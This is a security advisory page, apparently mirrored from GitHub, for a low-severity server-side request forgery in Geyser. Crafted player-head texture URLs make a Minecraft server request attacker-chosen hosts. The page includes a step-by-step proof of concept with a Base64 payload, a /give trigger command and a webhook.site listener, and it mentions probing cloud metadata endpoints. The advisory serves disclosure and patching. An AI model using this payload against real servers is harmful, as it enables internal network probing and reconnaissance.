GHSA-XCFG-FCR5-GW9R

Vulnerability from github – Published: 2026-05-05 20:03 – Updated: 2026-05-13 14:19
VLAI
Summary
Geyser Vulnerable to Server-Side Request Forgery (SSRF) via Player Head Texture URL in Geyser
Details

Summary

A server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data. By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints. This occurs server-side, without proper URL validation, and can be triggered by a Bedrock client.

Details

Geyser allows Bedrock clients to interact with Java Edition mechanics, including the creation of custom player heads using the minecraft:profile NBT structure.

When a player head is created with a custom textures property, Geyser processes the Base64-encoded JSON value and forwards the embedded texture URL for resolution. However, the URL contained in the textures.SKIN.url field is not sufficiently validated.

PoC

  1. Setup Environment:
  2. Set up a Minecraft Server (Paper/Spigot) with the latest version of Geyser installed.

  3. Ensure you have a Bedrock client connected.

  4. Prepare Listener:

  5. Go to webhook.site and obtain a unique URL (e.g., https://webhook.site/YOUR-UUID).

  6. Construct Payload:

  7. Create a JSON payload pointing to your listener URL: {"textures":{"SKIN":{"url":"https://webhook.site/YOUR-UUID"}}}

  8. Encode this JSON string to Base64. (You can use a terminal command: echo -n '{"textures":{"SKIN":{"url":"..."}}}' | base64)

  9. Execute Command:

  10. Run the following command in the Bedrock Edition client: /give @p minecraft:player_head[minecraft:profile={properties:[{name:"textures",value:"[PASTE_BASE64_HERE]"}]}]

  11. Verify:

  12. Check the webhook.site dashboard.
  13. You will see an HTTP GET request originating from the Minecraft Server's IP address, not the client's IP.

Impact

This vulnerability allows server-side request forgery (SSRF) from the Minecraft server to arbitrary HTTP endpoints.

Affected Parties

  • Minecraft servers running Geyser
  • Server operators exposing internal or cloud metadata endpoints

Potential Impacts

  • Internal network probing (e.g., intranet services, admin panels)
  • Cloud metadata access attempts (e.g., 169.254.169.254)
  • IP address disclosure of the Minecraft server
  • Abuse of the server as an HTTP request proxy

Although the vulnerability is blind SSRF (no response data returned to the attacker), it is still useful for: - Network mapping - Firewall bypass attempts - Cloud environment fingerprinting

Severity
2.4 (Low)
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.9.2"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.geysermc.geyser:core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.9.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42188"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T20:03:16Z",
    "nvd_published_at": "2026-05-11T22:22:11Z",
    "severity": "LOW"
  },
  "details": "### Summary\nA server-side request forgery (SSRF) vulnerability exists in Geyser\u2019s handling of Bedrock player head texture data.\nBy supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints.\nThis occurs server-side, without proper URL validation, and can be triggered by a Bedrock client.\n\n### Details\nGeyser allows Bedrock clients to interact with Java Edition mechanics, including the creation of custom player heads using the minecraft:profile NBT structure.\n\nWhen a player head is created with a custom textures property, Geyser processes the Base64-encoded JSON value and forwards the embedded texture URL for resolution.\nHowever, the URL contained in the textures.SKIN.url field is not sufficiently validated.\n### PoC\n\n1. **Setup Environment:**\n   - Set up a Minecraft Server (Paper/Spigot) with the latest version of Geyser installed.\n   - Ensure you have a Bedrock client connected.\n\n2. **Prepare Listener:**\n   - Go to [webhook.site](https://webhook.site) and obtain a unique URL (e.g., `https://webhook.site/YOUR-UUID`).\n\n3. **Construct Payload:**\n   - Create a JSON payload pointing to your listener URL:\n     `{\"textures\":{\"SKIN\":{\"url\":\"https://webhook.site/YOUR-UUID\"}}}`\n   - Encode this JSON string to Base64.\n     *(You can use a terminal command: `echo -n \u0027{\"textures\":{\"SKIN\":{\"url\":\"...\"}}}\u0027 | base64`)*\n\n4. **Execute Command:**\n   - Run the following command in the Bedrock Edition client:\n   `/give @p minecraft:player_head[minecraft:profile={properties:[{name:\"textures\",value:\"[PASTE_BASE64_HERE]\"}]}]`\n\n5. **Verify:**\n   - Check the webhook.site dashboard.\n   - You will see an **HTTP GET request originating from the Minecraft Server\u0027s IP address**, not the client\u0027s IP.\n\n### Impact\nThis vulnerability allows server-side request forgery (SSRF) from the Minecraft server to arbitrary HTTP endpoints.\n\n#### Affected Parties\n- Minecraft servers running Geyser\n- Server operators exposing internal or cloud metadata endpoints\n\n#### Potential Impacts\n- Internal network probing (e.g., intranet services, admin panels)\n- Cloud metadata access attempts (e.g., 169.254.169.254)\n- IP address disclosure of the Minecraft server\n- Abuse of the server as an HTTP request proxy\n\nAlthough the vulnerability is blind SSRF (no response data returned to the attacker), it is still useful for:\n- Network mapping\n- Firewall bypass attempts\n- Cloud environment fingerprinting",
  "id": "GHSA-xcfg-fcr5-gw9r",
  "modified": "2026-05-13T14:19:57Z",
  "published": "2026-05-05T20:03:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/GeyserMC/Geyser/security/advisories/GHSA-xcfg-fcr5-gw9r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42188"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/GeyserMC/Geyser"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Geyser Vulnerable to Server-Side Request Forgery (SSRF) via Player Head Texture URL in Geyser"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.